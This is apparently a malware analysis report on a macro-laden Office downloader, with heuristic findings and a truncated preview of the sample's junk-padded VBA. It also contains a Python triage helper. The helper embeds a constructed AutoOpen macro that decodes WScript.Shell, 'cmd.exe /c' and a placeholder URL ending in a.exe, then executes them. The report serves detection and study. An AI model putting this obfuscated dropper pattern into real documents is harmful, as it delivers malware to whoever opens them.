Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying obfuscated VBA macros, flagged by several high- and critical-severity heuristics, notably OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC. An AutoOpen macro (OLE_VBA_AUTOOPEN) means the code runs as soon as the document is opened with macros enabled, and a GetObject call (OLE_VBA_GETOBJ) is present in the source. The loader heuristic and the ClamAV name Doc.Downloader.Generic-7329563-0 point to a downloader whose job is to fetch and execute a second-stage payload. Two caveats for the analyst: the loader heuristic itself notes that this obfuscation shape keeps CreateObject/Shell/URL indicators out of the macro source, and the only URL extracted is the DrawingML schema namespace http://schemas.openxmlformats.org/drawingml/2006/main from the document body, so no download URL or command line was recovered statically; those strings are reconstructed at runtime. The extracted source preview shows the padding typical of this shape, address-like junk comments and dead assignments of the form Rnd(... * ChrB(n)) + Log(n), and the portion shown ends before any decoder or sink is reached. Note also that the medium-severity OLE_LEGACY_WORDBASIC_AUTOEXEC finding describes a case where no modern VBA project was recovered, which does not match the 82,616-byte VBA source olevba extracted here; treat it as a redundant marker rather than as independent evidence.
Heuristics (8)
- ClamAV: Doc.Downloader.Generic-7329563-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-7329563-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
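The loader heuristic above describes the three decoder shapes (numeric char-array, hex-string decode, junk-token Replace removal) and the reason they matter: the sink and the URL never appear as literals in the source. The following Python is an added triage helper, not part of the analyzer and not recovered from this sample. It strips the padding visible in the extracted preview (address-like comment lines and dead Rnd/Log assignments), emulates the three decoder shapes over a constructed VBA snippet, and then compares which sink tokens are visible in the raw source against which only appear after decoding. The VBA text, the reserved-domain URL http://example.invalid/a.exe, and the GetObject("new:...") instantiation are all constructed for the example.

```python
"""Triage helper for obfuscated auto-exec VBA loaders (added example).

Strips junk lines, emulates the three decoder shapes named by the
OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER description, and reports which sink
tokens are visible only after decoding. The VBA below is constructed to
mimic the shapes; it is not the analyzed sample's code.
"""
import re
from typing import Dict, List

# Constructed second-stage URL (RFC 2606 reserved domain, not an indicator).
STAGE2_URL = "http://example.invalid/a.exe"

# Constructed VBA: junk comments and dead Rnd/Log assignments copy the style
# of the extracted preview; the three decoders and the sink are invented.
SAMPLE_VBA = f"""Attribute VB_Name = "xc10x070b66c4"
Sub AutoOpen()
On Error Resume Next
'Lead7779 Bradtke Rue, Nienowmouth, Burundi Future1557 Dylan Gardens, Walterville, Slovenia
bb018030904 = Rnd(cc21008803x60 * ChrB(527)) + Log(967)
c80x700049xb2 = Rnd(b5190x65x4c89 * ChrB(254)) + Log(670)
a1 = Array(87, 83, 99, 114, 105, 112, 116, 46, 83, 104, 101, 108, 108)
For i = 0 To UBound(a1): s1 = s1 & Chr(a1(i)): Next
h1 = "{STAGE2_URL.encode().hex()}"
For j = 1 To Len(h1) Step 2: s2 = s2 & Chr(CLng("&H" & Mid(h1, j, 2))): Next
s3 = Replace("cQQmd.exQQe /QQc ", "QQ", "")
Set o = GetObject("new:" & s1)
o.Run s3 & s2
End Sub
"""

# Dead-code pattern seen in the preview: <var> = Rnd(<expr>) + Log(<n>)
DEAD_ASSIGN = re.compile(r"^\w+ = Rnd\(.*\) \+ Log\(\d+\)$")
CHAR_ARRAY = re.compile(r"Array\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")
HEX_LITERAL = re.compile(r'"([0-9a-fA-F]{8,})"')
REPLACE_JUNK = re.compile(r'Replace\("([^"]*)",\s*"([^"]*)",\s*""\)')

AUTOEXEC = ("AutoOpen", "Auto_Open", "Document_Open", "Workbook_Open", "AutoExec")
SINKS = ("CreateObject", "GetObject", "WScript.Shell", "Shell",
         "cmd.exe", "powershell", "http://", "https://")


def strip_junk(src: str) -> List[str]:
    """Drop blank lines, comments, Attribute lines and dead Rnd/Log assignments."""
    kept = []
    for line in src.splitlines():
        line = line.strip()
        if not line or line.startswith("'") or line.startswith("Attribute "):
            continue
        if DEAD_ASSIGN.match(line):
            continue
        kept.append(line)
    return kept


def recover_strings(src: str) -> List[str]:
    """Emulate the three decoder shapes and return the rebuilt strings."""
    out: List[str] = []
    for m in CHAR_ARRAY.finditer(src):                      # numeric char-array
        out.append("".join(chr(int(n)) for n in m.group(1).split(",")))
    for m in HEX_LITERAL.finditer(src):                     # hex-string decode
        h = m.group(1)
        if len(h) % 2 == 0:
            s = bytes.fromhex(h).decode("latin-1")
            if s.isprintable():
                out.append(s)
    for m in REPLACE_JUNK.finditer(src):                    # junk-token Replace
        out.append(m.group(1).replace(m.group(2), ""))
    return out


def triage(src: str) -> Dict[str, object]:
    """Compare sink tokens visible in source with those visible after decoding."""
    code = "\n".join(strip_junk(src))
    decoded = recover_strings(src)
    blob = " ".join(decoded)
    return {
        "autoexec": any(t in code for t in AUTOEXEC),
        "sinks_in_source": sorted(t for t in SINKS if t in code),
        "sinks_in_decoded": sorted(t for t in SINKS if t in blob),
        "decoded": decoded,
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_VBA).items():
        print(f"{k}: {v}")
```

On the constructed input only GetObject is visible in the source, while WScript.Shell, cmd.exe and the http:// URL surface only after the decoders run, which is exactly the gap the p-code and loader heuristics are written to close. The regexes are deliberately narrow; real loaders nest and chain these shapes, so treat the decoded list as a starting point for manual work, not as a complete string recovery.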
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 82,616 bytes | 998f55889a8e7803af82b8a86927a4f85b7ca2cfa8f4d4772896372680ac634b |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "c8033202417"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "x010864xb3461, 0, 0, MSForms, TextBox"
Attribute VB_Control = "ccc09596785, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0005x0ccc4cc, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bc763509187, 3, 3, MSForms, TextBox"
Attribute VB_Control = "x200b4c80x0, 4, 4, MSForms, TextBox"
Attribute VB_Control = "x5x3740407990, 5, 5, MSForms, TextBox"
Attribute VB_Name = "xc10x070b66c4"
Function x090c0c0x008()
On Error Resume Next
'Lead7779 Bradtke Rue, Nienowmouth, Burundi Future1557 Dylan Gardens, Walterville, Slovenia
bb018030904 = Rnd(cc21008803x60 * ChrB(527)) + Log(967)
'Regional29885 Kautzer Streets, Mohrmouth, Nicaragua Internal644 Macie Bypass, Cadeland, Kuwait
c80x700049xb2 = Rnd(b5190x65x4c89 * ChrB(254)) + Log(670)
'Forward39672 Katelynn Ways, Toreyburgh, Russian Federation Legacy7408 Mosciski Valleys, Oramouth, Haiti
c9070b0440030 = Rnd(c4000631c94c0 * ChrB(976)) + Log(310)
'Internal17326 Rice Crescent, New Connermouth, Macedonia National044 Prohaska Square, Beverlyberg, Bangladesh
x2x5x3c9006b = Rnd(c870b60800435 * ChrB(433)) + Log(345)
'Product39911 Mertz Squares, Alexysborough, Cocos (Keeling) Islands Senior58086 Roel Mills, West Queenberg, Christmas Island
b010069355888 = Rnd(x5642b019b8 * ChrB(524)) + Log(225)
'Lead5042 Deshaun Lake, Eunaport, Malta National3635 Kautzer Branch, Douglasville, Saudi Arabia
xb9050202302 = Rnd(x540b68700b * ChrB(762)) + Log(943)
'Chief154 Nathaniel Bridge, Port Lucio, Virgin Islands, British Corporate5506 Dibbert Glens, West Daryl, Thailand
c968201130010 = Rnd(xc0bb989217 * ChrB(720)) + Log(342)
'Regional71624 Amiya Forge, Joaquinbury, Saint Helena Future576 Bauch Creek, Sylviafurt, Eritrea
'Human7030 Lang Crest, Huelsberg, American Samoa District7744 Schaefer Coves, Cletamouth, Syrian Arab Republic
bc00bb7c08540 = Rnd(c8827370x02xx * ChrB(485)) + Log(51)
'Legacy2577 Kylie Locks, West Leonorchester, Ukraine Senior4201 Bruen Course, Jermaineville, Pakistan
b904810xb92 = Rnd(b29c80x7626 * ChrB(658)) + Log(447)
'Lead94788 Susanna Forks, Trantowmouth, Romania Global3246 Randy Key, Gradyberg, Niger
b000b7c6c9864 = Rnd(b67323202b3b0 * ChrB(766)) + Log(177)
'Lead579 Ruthe Springs, Jaidatown, Niger National447 Cristian Ville, South Felicitaburgh, Namibia
b1x90x1379093 = Rnd(b131009cc7b * ChrB(702)) + Log(92)
'Chief777 Wilfred River, Padbergtown, Saint Lucia Corporate7064 McKenzie Squares, South Erich, Rwanda
c95101246890 = Rnd(c82801c5c09 * ChrB(262)) + Log(132)
'Corporate16825 Rippin Parkways, West Sammy, Nigeria Internal722 Clotilde Greens, Lueilwitzmouth, Micronesia
cx0c00880190c = Rnd(x674699600b04 * ChrB(260)) + Log(966)
'National6373 O'Hara Vista, Koelpinstad, Mauritius Human37263 Jeanne Trail, South Granttown, Senegal
c5b163860097 = Rnd(b000527c312x * ChrB(912)) + Log(931)
'Dynamic79832 Gorczany Junctions, North Prince, Russian Federation International706 Breitenberg Wall, South Christyfort, Djibouti
'Global74024 Velva Ranch, West Durward, Burundi Dynamic575 Shaina Port, Schowalterside, Bouvet Island (Bouvetoya)
b0004c0b0856 = Rnd(c27059cb9003 * ChrB(857)) + Log(337)
'Regional380 Vincent Roads, Cassinland, Western Sahara Product4900 Monroe Rest, Predovicshire, Mongolia
xcb08424x399b = Rnd(x8007801x67 * ChrB(318)) + Log(303)
'Principal606 Burnice Springs, Dustinbury, Mexico Principal8392 Larissa Islands, East Billieview, Colombia
x0cb3x07680 = Rnd(x1210790820 * ChrB(574)) + Log(329)
'National302 Abshire Crescent, Port Filiberto, Guadeloupe Future463 Elyssa Cove, Faheyborough, Bahamas
xc0x2bx01x1 = Rnd(x5860x054000 * ChrB(282)) + Log(281)
'Future3462 Feeney Burg, Olliebury, Japan Dynamic5093 Moore Branch, Torphyshire, United States of America
c57927c908530 = Rnd(x1x63611c20 * ChrB(368)) + Log(792)
'Custome
... (truncated)